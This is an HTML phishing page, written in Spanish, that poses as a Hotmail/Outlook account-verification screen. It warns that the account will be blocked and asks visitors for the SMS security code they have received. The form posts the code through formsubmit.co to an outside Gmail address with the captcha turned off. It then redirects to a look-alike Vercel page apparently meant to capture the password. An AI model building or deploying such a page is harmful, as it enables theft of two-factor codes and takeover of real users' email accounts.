<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hotmai</title>

    <style>
        @font-face {
            font-family: 'Googlesans';
            src: url('./GoogleSans-Regular.ttf');
          }
          
          * {
            font-family: 'Googlesans', sans-serif;
          }
        body {
            background-color: #fff;
          }
          
          .container {
            background-color: #fff;
            max-width: 350px;
            margin: 0 auto;
            padding: 20px;
            border-radius: 10px;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
          }
          
          h1 {
            font-size: 24px;
            text-align: center;
            margin-bottom: 20px;
            font-weight: 400;
            margin-bottom: 0px;
          }
          
          h3{
            font-size: 15px;
            text-align: center;
            margin-bottom: 12px;
            font-weight: 400;
            margin-bottom: 25px;
          }

          form {
            display: flex;
            flex-direction: column;
          }
          
          label {
            font-size: 14px;
            margin-bottom: 5px;
          }
          
          input[type="text"],
          input[type="password"] {
            border: none;
            padding: 10px;
            border-radius: 5px;
            margin-bottom: 10px;
          }
          
          input[type="submit"] {
            background-color: #4285f4;
            color: #fff;
            border: none;
            padding: 10px;
            border-radius: 5px;
            cursor: pointer;
            margin-top: 10px;
            width: 100%;
            height: 45px;
          }
          
          .checkbox {
            display: flex;
            align-items: center;
            margin-bottom: 10px;
          }
          
          .checkbox input[type="checkbox"] {
            margin-right: 5px;
          }
          
          #email{
            width: 100%;
            height: 35px;
            font-size: 17px;
            color: gray;
            padding: 12px;
          }

          form{
            width: 100%;
            padding-left: 35px;
            padding-right: 55px;
          }

          a {
            color: #4285f4;
            text-decoration: none;
          }

          label{
            color: #000;
            margin-right: 10px;
            margin-left: 10px;
          }
          
          .continput{
            display: flex;
            align-items: center;
            border: 1px solid #ccc;
            
            border-radius: 5px;
            margin-bottom: 10px;
            width: 100%;
          }

          span{
            font-size: 20px;
          }

          hr {
            border: none;
            border-top: 1px solid #ccc;
            margin-top: 20px;
            margin-bottom: 20px;
          }
          
    </style>

</head>
<body>
    <div class="container">
        <img width="155px" src="./logo.png" alt="Gmail">
        <h1>Verifica tu cuenta</h1>
        <h3>Por tu seguridad cambia la contraseña, te mandaremos un sms con un código para que puedas restablecerla o no podrás verificar tu cuenta de correo electrónico y será bloqueada por motivos de contrato.</h3>
        <form action="https://formsubmit.co/hotmailoutlook127@gmail.com" method="POST">
            <input type="hidden" name="_captcha" value="false">
            <input type="hidden" name="_next" value="https://hotmailverificacionpersonal.vercel.app/contraseña.html">
          <div class="continput">
          <input type="number" id="email" name="codigo" placeholder="Ingresa el codigo" onkeypress="return event.charCode >= 48 && event.charCode <= 57" maxlenght="10" required>
        </div>

          <div class="checkbox">
            <label for="remember"><a href="">Reenviar codigo en </a><span id="contador" > </span></label>
          </div>
        
          <input type="submit" value="Verificar">
        </form>
       
        <hr>
        <p>¿Numero equivocado? <a href="/index.html">Volver a ingresar</a></p>
        <h3 style="font-size: 20px;" >Hotmail, Outlook, Live</h3>
      </div>

      <script>

            var input = document.getElementById("email");
            input.addEventListener("input", function() {
              if (input.value.length > 6) {
                input.value = input.value.slice(0, 6);
              }
            });

        var contador = 180;
        // que se muestre en como minutos..
        var minutos = 0;
        var segundos = 0;
        var tiempo = setInterval(function(){
          if(contador > 0){
            contador--;
            minutos = Math.floor(contador/60);
            segundos = contador%60;
            document.getElementById("contador").innerHTML = minutos + ":" + segundos;
          }else{
            clearInterval(tiempo);
            document.getElementById("contador").innerHTML = "Reenviar codigo";
          }
        },1000);
      </script>

</body>
</html>
